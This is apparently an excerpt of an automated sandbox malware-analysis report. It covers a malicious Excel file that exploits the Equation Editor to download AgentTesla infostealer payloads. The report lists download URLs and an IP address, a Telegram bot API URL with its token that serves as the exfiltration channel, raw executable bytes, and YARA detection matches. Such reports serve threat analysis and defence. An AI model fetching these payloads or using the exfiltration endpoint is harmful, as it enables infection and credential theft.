                Source: global traffic | HTTP traffic detected: GET /attachments/1001850193580392480/1002961152617222144/seven.dll HTTP/1.1 | Host: cdn.discordapp.com | Connection: Keep-Alive
                Source: global traffic | HTTP traffic detected: GET /htdocs/zTALg.exe HTTP/1.1 | Host: 109.206.241.81 | Connection: Keep-Alive
                Source: Joe Sandbox View | IP Address: 162.159.129.233 162.159.129.233
                Source: Joe Sandbox View | IP Address: 162.159.129.233 162.159.129.233
                Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 05 Aug 2022 09:41:36 GMTServer: Apache/2.4.53 (Win64) OpenSSL/1.1.1n PHP/7.4.29Last-Modified: Sun, 31 Jul 2022 13:41:30 GMTETag: "34400-5e51a0a6efe70"Accept-Ranges: bytesContent-Length: 214016Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 93 54 de 62 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 08 00 00 3c 03 00 00 06 00 00 00 00 00 00 ce 5b 03 00 00 20 00 00 00 00 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 a0 03 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 78 5b 03 00 53 00 00 00 00 60 03 00 f8 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 03 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 d4 3b 03 00 00 20 00 00 00 3c 03 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 f8 02 00 00 00 60 03 00 00 04 00 00 00 3e 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 80 03 00 00 02 00 00 00 42 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 5b 03 00 00 00 00 00 48 00 00 00 02 00 05 00 bc 84 02 00 bc d6 00 00 03 00 00 00 
11 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1e 02 28 01 00 00 0a 2a 1e 02 28 04 00 00 0a 2a a6 73 06 00 00 0a 80 01 00 00 04 73 07 00 00 0a 80 02 00 00 04 73 08 00 00 0a 80 03 00 00 04 73 09 00 00 0a 80 04 00 00 04 2a 00 00 13 30 02 00 2c 00 00 00 01 00 00 11 16 0b 2b 1b 00 07 17 fe 01 2c 02 18 0b 00 07 16 fe 01 2c 02 17 0b 00 07 18 fe 01 2c 02 2b 02 2b e3 7e 01 00 00 04 6f 0a 00 00 0a 2a 13 30 02 00 2c 00 00 00 02 00 00 11 16 0b 2b 1b 00 07 17 fe 01 2c 02 18 0b 00 07 16 fe 01 2c 02 17 0b 00 07 18 fe 01 2c 02 2b 02 2b e3 7e 02 00 00 04 6f 0b 00 00 0a 2a 13 30 02 00 2c 00 00 00 03 00 00 11 16 0b 2b 1b 00 07 17 fe 01 2c 02 18 0b 00 07 16 fe 01 2c 02 17 0b 00 07 18 fe 01 2c 02 2b 02 2b e3 7e 03 00 00 04 6f 0c 00 00 0a 2a 13 30 02 00 2c 00 00 00 04 00 00 11 16 0b 2b 1b 00 07 17 fe 01 2c 02 18 0b 00 07 16 fe 01 2c 02 17 0b 00 07 18 fe 01 2c 02 2b 02 2b e3 7e 04 00 00 04 6f 0d 00 00 0a 2a 13 30 02 00 2e 00 00 00 05 00 00 1
                Source: global traffic | HTTP traffic detected: GET /giving/qGTGx.exe HTTP/1.1 | Accept: */* | Accept-Encoding: gzip, deflate | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) | Host: pkusukoharjo.com | Connection: Keep-Alive
                Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49172
                Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49171
                Source: unknown | Network traffic detected: HTTP traffic on port 49172 -> 443
                Source: unknown | Network traffic detected: HTTP traffic on port 49171 -> 443
                Source: unknown | TCP traffic detected without corresponding DNS query: 109.206.241.81
                Source: unknown | TCP traffic detected without corresponding DNS query: 109.206.241.81
                Source: unknown | TCP traffic detected without corresponding DNS query: 109.206.241.81
                Source: unknown | TCP traffic detected without corresponding DNS query: 109.206.241.81
                Source: unknown | TCP traffic detected without corresponding DNS query: 109.206.241.81
                Source: unknown | TCP traffic detected without corresponding DNS query: 109.206.241.81
                Source: unknown | TCP traffic detected without corresponding DNS query: 109.206.241.81
                Source: unknown | TCP traffic detected without corresponding DNS query: 109.206.241.81
                Source: unknown | TCP traffic detected without corresponding DNS query: 109.206.241.81
                Source: unknown | TCP traffic detected without corresponding DNS query: 109.206.241.81
                Source: unknown | TCP traffic detected without corresponding DNS query: 109.206.241.81
                Source: unknown | TCP traffic detected without corresponding DNS query: 109.206.241.81
                Source: unknown | TCP traffic detected without corresponding DNS query: 109.206.241.81
                Source: unknown | TCP traffic detected without corresponding DNS query: 109.206.241.81
                Source: unknown | TCP traffic detected without corresponding DNS query: 109.206.241.81
                Source: unknown | TCP traffic detected without corresponding DNS query: 109.206.241.81
                Source: unknown | TCP traffic detected without corresponding DNS query: 109.206.241.81
                Source: unknown | TCP traffic detected without corresponding DNS query: 109.206.241.81
                Source: unknown | TCP traffic detected without corresponding DNS query: 109.206.241.81
                Source: unknown | TCP traffic detected without corresponding DNS query: 109.206.241.81
                Source: unknown | TCP traffic detected without corresponding DNS query: 109.206.241.81
                Source: unknown | TCP traffic detected without corresponding DNS query: 109.206.241.81
                Source: unknown | TCP traffic detected without corresponding DNS query: 109.206.241.81
                Source: unknown | TCP traffic detected without corresponding DNS query: 109.206.241.81
                Source: unknown | TCP traffic detected without corresponding DNS query: 109.206.241.81
                Source: unknown | TCP traffic detected without corresponding DNS query: 109.206.241.81
                Source: unknown | TCP traffic detected without corresponding DNS query: 109.206.241.81
                Source: unknown | TCP traffic detected without corresponding DNS query: 109.206.241.81
                Source: unknown | TCP traffic detected without corresponding DNS query: 109.206.241.81
                Source: unknown | TCP traffic detected without corresponding DNS query: 109.206.241.81
                Source: unknown | TCP traffic detected without corresponding DNS query: 109.206.241.81
                Source: unknown | TCP traffic detected without corresponding DNS query: 109.206.241.81
                Source: unknown | TCP traffic detected without corresponding DNS query: 109.206.241.81
                Source: unknown | TCP traffic detected without corresponding DNS query: 109.206.241.81
                Source: unknown | TCP traffic detected without corresponding DNS query: 109.206.241.81
                Source: unknown | TCP traffic detected without corresponding DNS query: 109.206.241.81
                Source: unknown | TCP traffic detected without corresponding DNS query: 109.206.241.81
                Source: unknown | TCP traffic detected without corresponding DNS query: 109.206.241.81
                Source: unknown | TCP traffic detected without corresponding DNS query: 109.206.241.81
                Source: unknown | TCP traffic detected without corresponding DNS query: 109.206.241.81
                Source: unknown | TCP traffic detected without corresponding DNS query: 109.206.241.81
                Source: unknown | TCP traffic detected without corresponding DNS query: 109.206.241.81
                Source: unknown | TCP traffic detected without corresponding DNS query: 109.206.241.81
                Source: unknown | TCP traffic detected without corresponding DNS query: 109.206.241.81
                Source: unknown | TCP traffic detected without corresponding DNS query: 109.206.241.81
                Source: unknown | TCP traffic detected without corresponding DNS query: 109.206.241.81
                Source: unknown | TCP traffic detected without corresponding DNS query: 109.206.241.81
                Source: unknown | TCP traffic detected without corresponding DNS query: 109.206.241.81
                Source: unknown | TCP traffic detected without corresponding DNS query: 109.206.241.81
                Source: unknown | TCP traffic detected without corresponding DNS query: 109.206.241.81
                Source: EQNEDT32.EXE, 00000002.00000002.996185247.0000000000586000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: /moc.nideknil.wwwwww.linkedin.com,Rj equals www.linkedin.com (Linkedin)
                Source: EQNEDT32.EXE, 00000002.00000002.996185247.0000000000586000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: www.linkedin.com equals www.linkedin.com (Linkedin)
                Source: EQNEDT32.EXE, 00000002.00000002.996256173.0000000000621000.00000004.00000020.00020000.00000000.sdmp, jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.exe, 00000005.00000002.1006789724.00000000006DA000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
                Source: jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.exe, 00000005.00000002.1006963695.0000000002401000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://109.206.241.81/htdocs/zTALg.exe
                Source: jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.exe, 00000005.00000002.1007008986.0000000002443000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://109.206.241.81P
                Source: EQNEDT32.EXE, 00000002.00000002.996246664.0000000000613000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000002.996256173.0000000000621000.00000004.00000020.00020000.00000000.sdmp, jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.exe, 00000005.00000002.1006789724.00000000006DA000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
                Source: EQNEDT32.EXE, 00000002.00000002.996256173.0000000000621000.00000004.00000020.00020000.00000000.sdmp, jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.exe, 00000005.00000002.1006789724.00000000006DA000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.entrust.net/2048ca.crl0
                Source: EQNEDT32.EXE, 00000002.00000002.996246664.0000000000613000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000002.996256173.0000000000621000.00000004.00000020.00020000.00000000.sdmp, jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.exe, 00000005.00000002.1006789724.00000000006DA000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.entrust.net/server1.crl0
                Source: EQNEDT32.EXE, 00000002.00000002.996256173.0000000000621000.00000004.00000020.00020000.00000000.sdmp, jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.exe, 00000005.00000002.1006721618.000000000067D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
                Source: EQNEDT32.EXE, 00000002.00000002.996246664.0000000000613000.00000004.00000020.00020000.00000000.sdmp, jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.exe, 00000005.00000002.1006789724.00000000006DA000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
                Source: EQNEDT32.EXE, 00000002.00000002.996246664.0000000000613000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000002.996256173.0000000000621000.00000004.00000020.00020000.00000000.sdmp, jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.exe, 00000005.00000002.1006789724.00000000006DA000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
                Source: EQNEDT32.EXE, 00000002.00000002.996256173.0000000000621000.00000004.00000020.00020000.00000000.sdmp, jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.exe, 00000005.00000002.1006789724.00000000006DA000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.comodoca.com0
                Source: EQNEDT32.EXE, 00000002.00000002.996246664.0000000000613000.00000004.00000020.00020000.00000000.sdmp, jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.exe, 00000005.00000002.1006789724.00000000006DA000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.comodoca.com0%
                Source: EQNEDT32.EXE, 00000002.00000002.996256173.0000000000621000.00000004.00000020.00020000.00000000.sdmp, jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.exe, 00000005.00000002.1006789724.00000000006DA000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ocsp.comodoca.com0-
                Source: EQNEDT32.EXE, 00000002.00000002.996246664.0000000000613000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000002.996256173.0000000000621000.00000004.00000020.00020000.00000000.sdmp, jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.exe, 00000005.00000002.1006789724.00000000006DA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0/
                Source: EQNEDT32.EXE, 00000002.00000002.996246664.0000000000613000.00000004.00000020.00020000.00000000.sdmp, jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.exe, 00000005.00000002.1006789724.00000000006DA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com05
                Source: EQNEDT32.EXE, 00000002.00000002.996246664.0000000000613000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000002.996256173.0000000000621000.00000004.00000020.00020000.00000000.sdmp, jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.exe, 00000005.00000002.1006789724.00000000006DA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.entrust.net03
                Source: EQNEDT32.EXE, 00000002.00000002.996256173.0000000000621000.00000004.00000020.00020000.00000000.sdmp, jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.exe, 00000005.00000002.1006789724.00000000006DA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.entrust.net0D
                Source: jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.exe, 00000005.00000002.1006963695.0000000002401000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                Source: EQNEDT32.EXE, 00000002.00000002.996256173.0000000000621000.00000004.00000020.00020000.00000000.sdmp, jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.exe, 00000005.00000002.1006789724.00000000006DA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com.my/cps.htm02
                Source: EQNEDT32.EXE, 00000002.00000002.996246664.0000000000613000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000002.996256173.0000000000621000.00000004.00000020.00020000.00000000.sdmp, jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.exe, 00000005.00000002.1006789724.00000000006DA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
                Source: jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.exe, 00000005.00000002.1010469856.000000000349E000.00000004.00000800.00020000.00000000.sdmp, jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.exe, 00000005.00000002.1010395589.0000000003429000.00000004.00000800.00020000.00000000.sdmp, powershell_ise.exe, 00000006.00000000.1005349570.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot5520247480:AAEoBq-eVV-KfON2FKSf_2riekCozVDdnus/
                Source: jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.exe, 00000005.00000002.1006963695.0000000002401000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.discordapp.com
                Source: jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.exe, 00000005.00000002.1006963695.0000000002401000.00000004.00000800.00020000.00000000.sdmp, jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.exe, 00000005.00000002.1006789724.00000000006DA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.discordapp.com/attachments/1001850193580392480/1002961152617222144/seven.dll
                Source: EQNEDT32.EXE, 00000002.00000002.996185247.0000000000586000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pkusukoharjo.com/
                Source: EQNEDT32.EXE, 00000002.00000002.996185247.0000000000586000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pkusukoharjo.com/giving/qGTGx.exe
                Source: dbSYXB9S.Pu6cLString found in binary or memory: https://pkusukoharjo.com/giving/qGTGx.exej
                Source: EQNEDT32.EXE, 00000002.00000002.996175505.000000000056F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pkusukoharjo.com/giving/qGTGx.exejjC:
                Source: EQNEDT32.EXE, 00000002.00000002.996185247.0000000000586000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pkusukoharjo.com/y
                Source: EQNEDT32.EXE, 00000002.00000002.996246664.0000000000613000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000002.00000002.996256173.0000000000621000.00000004.00000020.00020000.00000000.sdmp, jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.exe, 00000005.00000002.1006789724.00000000006DA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://secure.comodo.com/CPS0
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\84E7CB3E.pngJump to behavior
                Source: unknownDNS traffic detected: queries for: pkusukoharjo.com
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_038A8B6F LoadLibraryW,URLDownloadToFileW,2_2_038A8B6F
                Source: global trafficHTTP traffic detected: GET /giving/qGTGx.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: pkusukoharjo.comConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /attachments/1001850193580392480/1002961152617222144/seven.dll HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /htdocs/zTALg.exe HTTP/1.1Host: 109.206.241.81Connection: Keep-Alive
                Source: unknownHTTPS traffic detected: 136.243.86.20:443 -> 192.168.2.22:49171 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 162.159.129.233:443 -> 192.168.2.22:49172 version: TLS 1.2

                System Summary

                Source: dump.pcap, type: PCAP | Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f Author: unknown
                Source: sheet1.xml, type: SAMPLE | Matched rule: detects AutoLoad documents using LegacyDrawing Author: ditekSHen
                Source: 5.2.jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.exe.34294f0.3.raw.unpack, type: UNPACKEDPE | Matched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
                Source: 5.2.jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.exe.34294f0.3.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f Author: unknown
                Source: 5.2.jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.exe.349e950.4.unpack, type: UNPACKEDPE | Matched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
                Source: 5.2.jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.exe.349e950.4.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f Author: unknown
                Source: 5.2.jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.exe.349e950.4.raw.unpack, type: UNPACKEDPE | Matched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
                Source: 5.2.jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.exe.349e950.4.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f Author: unknown
                Source: 6.0.powershell_ise.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: AgentTeslaV3 infostealer payload Author: ditekSHen
                Source: 6.0.powershell_ise.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f Author: unknown
                Source: 00000006.00000000.1005349570.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f Author: unknown
                Source: 00000005.00000002.1010469856.000000000349E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f Author: unknown
                Source: 00000005.00000002.1010395589.0000000003429000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f Author: unknown
                Source: Process Memory Space: jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.exe PID: 2912, type: MEMORYSTR | Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f Author: unknown
                Source: Process Memory Space: powershell_ise.exe PID: 304, type: MEMORYSTR | Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f Author: unknown
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | File created: C:\Users\user\AppData\Roaming\jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.exe
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\qGTGx[1].exe
                Source: dump.pcap, type: PCAP | Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f reference_sample = 65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc, id = d3ac2b2f-14fc-4851-8a57-41032e386aeb, last_modified = 2022-06-20
                Source: sheet1.xml, type: SAMPLE | Matched rule: INDICATOR_XML_LegacyDrawing_AutoLoad_Document author = ditekSHen, description = detects AutoLoad documents using LegacyDrawing
                Source: 5.2.jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.exe.34294f0.3.raw.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                Source: 5.2.jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.exe.34294f0.3.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f reference_sample = 65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc, id = d3ac2b2f-14fc-4851-8a57-41032e386aeb, last_modified = 2022-06-20
                Source: 5.2.jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.exe.349e950.4.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                Source: 5.2.jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.exe.349e950.4.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f reference_sample = 65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc, id = d3ac2b2f-14fc-4851-8a57-41032e386aeb, last_modified = 2022-06-20
                Source: 5.2.jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.exe.349e950.4.raw.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                Source: 5.2.jhghyftvgyjhjhgjhjhggfresewdxrcnvfhgfhggfrtreaebvcnbnc.exe.349e950.4.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f reference_sample = 65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc, id = d3ac2b2f-14fc-4851-8a57-41032e386aeb, last_modified = 2022-06-20
                Source: 6.0.powershell_ise.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_AgentTeslaV3 author = ditekSHen, description = AgentTeslaV3 infostealer payload
                Source: 6.0.powershell_ise.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f reference_sample = 65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc, id = d3ac2b2f-14fc-4851-8a57-41032e386aeb, last_modified = 2022-06-20
                Source: 00000006.00000000.1005349570.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f reference_sample = 65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc, id = d3ac2b2f-14fc-4851-8a57-41032e386aeb, last_modified = 2022-06-20
                Source: 00000005.00000002.1010469856.000000000349E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f reference_sample = 65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc, id = d3ac2b2f-14fc-4851-8a57-41032e386aeb, last_modified = 2022-06-20
                Source: 00000005.00000002.1010395589.0000000003429000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_AgentTesla_d3ac2b2f reference_sample = 65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.AgentTesla, fingerprint = cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc, id = d3ac2b2f-14fc-4851-8a57-41032e386aeb, last_modified = 2022-06-20
